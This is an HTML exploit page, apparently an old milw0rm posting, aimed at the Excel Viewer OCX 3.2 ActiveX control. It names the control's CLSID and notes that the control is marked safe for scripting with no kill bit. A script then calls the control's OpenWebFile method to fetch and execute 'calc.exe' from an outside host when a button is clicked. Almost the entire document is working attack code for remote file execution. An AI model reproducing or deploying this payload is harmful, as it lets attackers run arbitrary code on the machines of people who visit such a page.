<HTML>
---------------------------------------------------------- <br>
Excel Viewer OCX 3.2 Remote File execution exploit <br>
---------------------------------------------------------- <br>
-----------------------------------<br>
# By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class EXCEL
GUID: {18A295DA-088E-42D1-BE31-5028D7F9B965}
Number of Interfaces: 1
Default Interface: _DEXCEL
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {18A295DA-088E-42D1-BE31-5028D7F9B965}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data -->
<title>Excel Viewer OCX 3.2 Remote File execution exploit</title>
<BODY>
<object id=Stack classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<SCRIPT>
function Do_it()
{
File = "http://monmaroc.com/calc.exe"
Stack.OpenWebFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>
# milw0rm.com [2009-01-14]